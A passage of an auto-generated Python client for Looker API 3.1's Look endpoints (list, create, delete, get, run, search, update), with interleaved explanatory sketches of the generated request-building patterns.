This is where support for new Looker features will appear as non-breaking additions - new functions, new optional parameters on existing functions, or new optional properties in existing types. Additive changes should not impact your existing application code that calls the Looker API. Your existing application code will not be aware of any new Looker API functionality until you choose to upgrade your app to use a newer Looker API client SDK release. The following are a few examples of noteworthy items that have changed between API 3.0 and API 3.1. For more comprehensive coverage of API changes, please see the release notes for your Looker release. ### Examples of new things added in API 3.1: * Dashboard construction APIs * Themes and custom color collections APIs * Create and run SQL_runner queries * Create and run merged results queries * Create and modify dashboard filters * Create and modify password requirements ### Deprecated in API 3.0 The following functions and properties have been deprecated in API 3.0. They continue to exist and work in API 3.0 for the next several Looker releases but they have not been carried forward to API 3.1: * Dashboard Prefetch functions * User access_filter functions * User API 1.0 credentials functions * Space.is_root and Space.is_user_root properties. Use Space.is_shared_root and Space.is_users_root instead. ### Semantic changes in API 3.1: * `all_looks` no longer includes soft-deleted looks, matching `all_dashboards` behavior. You can find soft-deleted looks using `search_looks` with the `deleted` param set to True. * `all_spaces` no longer includes duplicate items * `search_users` no longer accepts Y,y,1,0,N,n for Boolean params, only \"true\" and \"false\". * For greater client and network compatibility, `render_task_results` now returns HTTP status ***202 Accepted*** instead of HTTP status ***102 Processing*** * `all_running_queries` and `kill_query` functions have moved into the `Query` function group. 
If you have application code which relies on the old behavior of the APIs above, you may continue using the API 3.0 functions in this Looker release. We strongly suggest you update your code to use API 3.1 analogs as soon as possible.
OpenAPI spec version: 3.1.0
Contact: support@looker.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class LookApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def all_looks(self, **kwargs):
"""
Get All Looks
### Get information about all active Looks Returns an array of **abbreviated Look objects** describing all the looks that the caller has access to. Soft-deleted Looks are **not** included. Get the **full details** of a specific look by id with [Look](#!/Look/look) Find **soft-deleted looks** with [Search Looks](#!/Looks/search_looks)
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.all_looks(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str fields: Requested fields.
:return: list[Look]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.all_looks_with_http_info(**kwargs)
else:
(data) = self.all_looks_with_http_info(**kwargs)
return data
def all_looks_with_http_info(self, **kwargs):
"""
Get All Looks
### Get information about all active Looks Returns an array of **abbreviated Look objects** describing all the looks that the caller has access to. Soft-deleted Looks are **not** included. Get the **full details** of a specific look by id with [Look](#!/Look/look) Find **soft-deleted looks** with [Search Looks](#!/Looks/search_looks)
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.all_looks_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str fields: Requested fields.
:return: list[Look]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_looks" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/looks'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Look]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_look(self, **kwargs):
"""
Create Look
### Create a Look with specified information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_look(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param LookWithQuery body: Look
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_look_with_http_info(**kwargs)
else:
(data) = self.create_look_with_http_info(**kwargs)
return data
def create_look_with_http_info(self, **kwargs):
"""
Create Look
### Create a Look with specified information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_look_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param LookWithQuery body: Look
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'fields']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_look" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/looks'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LookWithQuery',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
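Each public wrapper above follows the same dispatch pattern: it forces `_return_http_data_only`, then either hands back the worker's request thread (when a `callback` is supplied) or the unwrapped response data. A minimal standalone sketch of that pattern, with a toy worker standing in for `create_look_with_http_info` (names here are illustrative, not the real `api_client`):

```python
def dispatch(worker, **kwargs):
    # Force the worker to return only the response body,
    # not a (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous path: the worker returns a thread and the
        # callback later receives the deserialized response.
        return worker(**kwargs)
    # Synchronous path: return the unwrapped data directly.
    return worker(**kwargs)

def fake_worker(**kwargs):
    # Toy stand-in that just echoes what it was called with.
    return {'echo': kwargs}

result = dispatch(fake_worker, fields='id,title')
```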
def delete_look(self, look_id, **kwargs):
"""
Delete Look
### Delete the look with a specific id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_look(look_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_look_with_http_info(look_id, **kwargs)
else:
data = self.delete_look_with_http_info(look_id, **kwargs)
return data
def delete_look_with_http_info(self, look_id, **kwargs):
"""
Delete Look
### Delete the look with a specific id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_look_with_http_info(look_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['look_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_look" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'look_id' is set
if ('look_id' not in params) or (params['look_id'] is None):
raise ValueError("Missing the required parameter `look_id` when calling `delete_look`")
collection_formats = {}
resource_path = '/looks/{look_id}'.replace('{format}', 'json')
path_params = {}
if 'look_id' in params:
path_params['look_id'] = params['look_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
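The `*_with_http_info` workers validate required path parameters before building the request, rejecting both a missing key and an explicit `None`. A self-contained sketch of that guard (`require_param` is a hypothetical helper, not part of this module):

```python
def require_param(params, name, method):
    # Mirrors the generated guard: a required parameter must be
    # present and must not be None.
    if (name not in params) or (params[name] is None):
        raise ValueError(
            "Missing the required parameter `%s` when calling `%s`"
            % (name, method))

try:
    require_param({'look_id': None}, 'look_id', 'delete_look')
    raised = False
except ValueError:
    raised = True
```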
def look(self, look_id, **kwargs):
"""
Get Look
### Get a Look. Returns detailed information about a Look and its associated Query.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.look(look_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.look_with_http_info(look_id, **kwargs)
else:
data = self.look_with_http_info(look_id, **kwargs)
return data
def look_with_http_info(self, look_id, **kwargs):
"""
Get Look
### Get a Look. Returns detailed information about a Look and its associated Query.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.look_with_http_info(look_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['look_id', 'fields']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method look" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'look_id' is set
if ('look_id' not in params) or (params['look_id'] is None):
raise ValueError("Missing the required parameter `look_id` when calling `look`")
collection_formats = {}
resource_path = '/looks/{look_id}'.replace('{format}', 'json')
path_params = {}
if 'look_id' in params:
path_params['look_id'] = params['look_id']
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LookWithQuery',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
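`resource_path` templates such as `/looks/{look_id}` are filled in from `path_params` by the API client when `call_api` builds the URL. A rough sketch of that substitution (the real client also URL-encodes each value; this toy version does not):

```python
def build_path(template, path_params):
    # Substitute each {name} placeholder with its stringified value.
    for name, value in path_params.items():
        template = template.replace('{%s}' % name, str(value))
    return template

path = build_path('/looks/{look_id}', {'look_id': 42})
```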
def run_look(self, look_id, result_format, **kwargs):
"""
Run Look
### Run a Look

Runs a given look's query and returns the results in the requested format.

Supported formats:

| result_format | Description |
| :-----------: | :--- |
| json | Plain json |
| json_detail | Row data plus metadata describing the fields, pivots, table calcs, and other aspects of the query |
| csv | Comma separated values with a header |
| txt | Tab separated values with a header |
| html | Simple html |
| md | Simple markdown |
| xlsx | MS Excel spreadsheet |
| sql | Returns the generated SQL rather than running the query |
| png | A PNG image of the visualization of the query |
| jpg | A JPG image of the visualization of the query |
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.run_look(look_id, result_format, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param str result_format: Format of result (required)
:param int limit: Row limit (may override the limit in the saved query).
:param bool apply_formatting: Apply model-specified formatting to each result.
:param bool apply_vis: Apply visualization options to results.
:param bool cache: Get results from cache if available.
:param int image_width: Render width for image formats.
:param int image_height: Render height for image formats.
:param bool generate_drill_links: Generate drill links (only applicable to 'json_detail' format).
:param bool force_production: Force use of production models even if the user is in development mode.
:param bool cache_only: Retrieve any results from cache even if the results have expired.
:param str path_prefix: Prefix to use for drill links (url encoded).
:param bool rebuild_pdts: Rebuild PDTs used in query.
:param bool server_table_calcs: Perform table calculations on query results.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.run_look_with_http_info(look_id, result_format, **kwargs)
else:
data = self.run_look_with_http_info(look_id, result_format, **kwargs)
return data
def run_look_with_http_info(self, look_id, result_format, **kwargs):
"""
Run Look
### Run a Look

Runs a given look's query and returns the results in the requested format.

Supported formats:

| result_format | Description |
| :-----------: | :--- |
| json | Plain json |
| json_detail | Row data plus metadata describing the fields, pivots, table calcs, and other aspects of the query |
| csv | Comma separated values with a header |
| txt | Tab separated values with a header |
| html | Simple html |
| md | Simple markdown |
| xlsx | MS Excel spreadsheet |
| sql | Returns the generated SQL rather than running the query |
| png | A PNG image of the visualization of the query |
| jpg | A JPG image of the visualization of the query |
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.run_look_with_http_info(look_id, result_format, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param str result_format: Format of result (required)
:param int limit: Row limit (may override the limit in the saved query).
:param bool apply_formatting: Apply model-specified formatting to each result.
:param bool apply_vis: Apply visualization options to results.
:param bool cache: Get results from cache if available.
:param int image_width: Render width for image formats.
:param int image_height: Render height for image formats.
:param bool generate_drill_links: Generate drill links (only applicable to 'json_detail' format).
:param bool force_production: Force use of production models even if the user is in development mode.
:param bool cache_only: Retrieve any results from cache even if the results have expired.
:param str path_prefix: Prefix to use for drill links (url encoded).
:param bool rebuild_pdts: Rebuild PDTs used in query.
:param bool server_table_calcs: Perform table calculations on query results.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['look_id', 'result_format', 'limit', 'apply_formatting', 'apply_vis', 'cache', 'image_width', 'image_height', 'generate_drill_links', 'force_production', 'cache_only', 'path_prefix', 'rebuild_pdts', 'server_table_calcs']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method run_look" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'look_id' is set
if ('look_id' not in params) or (params['look_id'] is None):
raise ValueError("Missing the required parameter `look_id` when calling `run_look`")
# verify the required parameter 'result_format' is set
if ('result_format' not in params) or (params['result_format'] is None):
raise ValueError("Missing the required parameter `result_format` when calling `run_look`")
collection_formats = {}
resource_path = '/looks/{look_id}/run/{result_format}'.replace('{format}', 'json')
path_params = {}
if 'look_id' in params:
path_params['look_id'] = params['look_id']
if 'result_format' in params:
path_params['result_format'] = params['result_format']
query_params = {}
if 'limit' in params:
query_params['limit'] = params['limit']
if 'apply_formatting' in params:
query_params['apply_formatting'] = params['apply_formatting']
if 'apply_vis' in params:
query_params['apply_vis'] = params['apply_vis']
if 'cache' in params:
query_params['cache'] = params['cache']
if 'image_width' in params:
query_params['image_width'] = params['image_width']
if 'image_height' in params:
query_params['image_height'] = params['image_height']
if 'generate_drill_links' in params:
query_params['generate_drill_links'] = params['generate_drill_links']
if 'force_production' in params:
query_params['force_production'] = params['force_production']
if 'cache_only' in params:
query_params['cache_only'] = params['cache_only']
if 'path_prefix' in params:
query_params['path_prefix'] = params['path_prefix']
if 'rebuild_pdts' in params:
query_params['rebuild_pdts'] = params['rebuild_pdts']
if 'server_table_calcs' in params:
query_params['server_table_calcs'] = params['server_table_calcs']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text', 'application/json', 'image/png', 'image/jpg'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
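`run_look_with_http_info` copies each optional argument into `query_params` only when the caller actually supplied it; the long run of `if 'x' in params` blocks reduces to this one pattern. A standalone sketch (hypothetical helper, not the generated code itself):

```python
def collect_query_params(params, names):
    # Keep only the optional parameters the caller actually passed;
    # anything absent from `params` is simply omitted from the query string.
    return {n: params[n] for n in names if n in params}

qp = collect_query_params(
    {'limit': 10, 'cache': True},
    ['limit', 'apply_formatting', 'cache', 'image_width'])
```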
def search_looks(self, **kwargs):
"""
Search Looks
### Search Looks

Returns an **array of Look objects** that match the specified search criteria.

If multiple search params are given and `filter_or` is FALSE or not specified,
search params are combined in a logical AND operation.
Only rows that match *all* search param criteria will be returned.

If `filter_or` is TRUE, multiple search params are combined in a logical OR operation.
Results will include rows that match **any** of the search criteria.

String search params use case-insensitive matching.
String search params can contain `%` and `_` as SQL LIKE pattern match wildcard expressions.
example=\"dan%\" will match \"danger\" and \"Danzig\" but not \"David\"
example=\"D_m%\" will match \"Damage\" and \"dump\"

Integer search params can accept a single value or a comma separated list of values.
The multiple values will be combined under a logical OR operation -
results will match at least one of the given values.

Most search params can accept \"IS NULL\" and \"NOT NULL\" as special expressions to match
or exclude (respectively) rows where the column is null.

Boolean search params accept only \"true\" and \"false\" as values.

Get a **single look** by id with [Look](#!/Look/look)
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_looks(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str title: Match Look title.
:param str description: Match Look description.
:param int content_favorite_id: Select looks with a particular content favorite id
:param str space_id: Select looks in a particular space.
:param str user_id: Select looks created by a particular user.
:param str view_count: Select looks with a particular view_count value.
:param bool deleted: Select soft-deleted looks
:param int query_id: Select looks that reference a particular query by query_id
:param str fields: Requested fields.
:param int page: Requested page.
:param int per_page: Results per page.
:param int limit: Number of results to return. (used with offset and takes priority over page and per_page)
:param int offset: Number of results to skip before returning any. (used with limit and takes priority over page and per_page)
:param str sorts: One or more fields to sort results by. Sortable fields: [:title, :user_id, :id, :created_at, :space_id, :description, :updated_at, :last_updater_id, :view_count, :favorite_count, :content_favorite_id, :deleted, :deleted_at, :last_viewed_at, :query_id]
:param bool filter_or: Combine given search criteria in a boolean OR expression
:return: list[Look]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.search_looks_with_http_info(**kwargs)
else:
data = self.search_looks_with_http_info(**kwargs)
return data
def search_looks_with_http_info(self, **kwargs):
"""
Search Looks
### Search Looks

Returns an **array of Look objects** that match the specified search criteria.

If multiple search params are given and `filter_or` is FALSE or not specified,
search params are combined in a logical AND operation.
Only rows that match *all* search param criteria will be returned.

If `filter_or` is TRUE, multiple search params are combined in a logical OR operation.
Results will include rows that match **any** of the search criteria.

String search params use case-insensitive matching.
String search params can contain `%` and `_` as SQL LIKE pattern match wildcard expressions.
example=\"dan%\" will match \"danger\" and \"Danzig\" but not \"David\"
example=\"D_m%\" will match \"Damage\" and \"dump\"

Integer search params can accept a single value or a comma separated list of values.
The multiple values will be combined under a logical OR operation -
results will match at least one of the given values.

Most search params can accept \"IS NULL\" and \"NOT NULL\" as special expressions to match
or exclude (respectively) rows where the column is null.

Boolean search params accept only \"true\" and \"false\" as values.

Get a **single look** by id with [Look](#!/Look/look)
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_looks_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str title: Match Look title.
:param str description: Match Look description.
:param int content_favorite_id: Select looks with a particular content favorite id
:param str space_id: Select looks in a particular space.
:param str user_id: Select looks created by a particular user.
:param str view_count: Select looks with a particular view_count value.
:param bool deleted: Select soft-deleted looks
:param int query_id: Select looks that reference a particular query by query_id
:param str fields: Requested fields.
:param int page: Requested page.
:param int per_page: Results per page.
:param int limit: Number of results to return. (used with offset and takes priority over page and per_page)
:param int offset: Number of results to skip before returning any. (used with limit and takes priority over page and per_page)
:param str sorts: One or more fields to sort results by. Sortable fields: [:title, :user_id, :id, :created_at, :space_id, :description, :updated_at, :last_updater_id, :view_count, :favorite_count, :content_favorite_id, :deleted, :deleted_at, :last_viewed_at, :query_id]
:param bool filter_or: Combine given search criteria in a boolean OR expression
:return: list[Look]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['title', 'description', 'content_favorite_id', 'space_id', 'user_id', 'view_count', 'deleted', 'query_id', 'fields', 'page', 'per_page', 'limit', 'offset', 'sorts', 'filter_or']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_looks" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/looks/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'title' in params:
query_params['title'] = params['title']
if 'description' in params:
query_params['description'] = params['description']
if 'content_favorite_id' in params:
query_params['content_favorite_id'] = params['content_favorite_id']
if 'space_id' in params:
query_params['space_id'] = params['space_id']
if 'user_id' in params:
query_params['user_id'] = params['user_id']
if 'view_count' in params:
query_params['view_count'] = params['view_count']
if 'deleted' in params:
query_params['deleted'] = params['deleted']
if 'query_id' in params:
query_params['query_id'] = params['query_id']
if 'fields' in params:
query_params['fields'] = params['fields']
if 'page' in params:
query_params['page'] = params['page']
if 'per_page' in params:
query_params['per_page'] = params['per_page']
if 'limit' in params:
query_params['limit'] = params['limit']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'sorts' in params:
query_params['sorts'] = params['sorts']
if 'filter_or' in params:
query_params['filter_or'] = params['filter_or']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Look]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
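The search docstring describes SQL `LIKE` semantics for string params: `%` matches any run of characters and `_` exactly one, case-insensitively. A small sketch of that matching via a regex translation (illustrative only; the actual matching happens server-side, and `like_match` is a hypothetical name):

```python
import re

def like_match(pattern, value):
    # Translate SQL LIKE wildcards to a regex: % -> .*, _ -> .
    # (re.escape on Python 3.7+ leaves % and _ unescaped.)
    regex = re.escape(pattern).replace('%', '.*').replace('_', '.')
    return re.fullmatch(regex, value, re.IGNORECASE) is not None

m1 = like_match('dan%', 'Danzig')   # matches, per the docstring example
m2 = like_match('dan%', 'David')    # does not match
```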
def update_look(self, look_id, body, **kwargs):
"""
Update Look
### Update the Look with a specific id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_look(look_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param LookWithQuery body: Look (required)
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_look_with_http_info(look_id, body, **kwargs)
else:
data = self.update_look_with_http_info(look_id, body, **kwargs)
return data
def update_look_with_http_info(self, look_id, body, **kwargs):
"""
Update Look
### Update the Look with a specific id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_look_with_http_info(look_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param LookWithQuery body: Look (required)
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['look_id', 'body', 'fields']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_look" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'look_id' is set
if ('look_id' not in params) or (params['look_id'] is None):
raise ValueError("Missing the required parameter `look_id` when calling `update_look`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_look`")
collection_formats = {}
resource_path = '/looks/{look_id}'.replace('{format}', 'json')
path_params = {}
if 'look_id' in params:
path_params['look_id'] = params['look_id']
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LookWithQuery',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 52.278509 | 4,190 | 0.609715 | 5,550 | 47,678 | 5.061622 | 0.093333 | 0.039869 | 0.024811 | 0.020967 | 0.812509 | 0.793571 | 0.787876 | 0.780507 | 0.767336 | 0.76488 | 0 | 0.001334 | 0.308276 | 47,678 | 911 | 4,191 | 52.335895 | 0.850455 | 0.468098 | 0 | 0.713647 | 0 | 0 | 0.17746 | 0.021805 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033557 | false | 0 | 0.01566 | 0 | 0.098434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
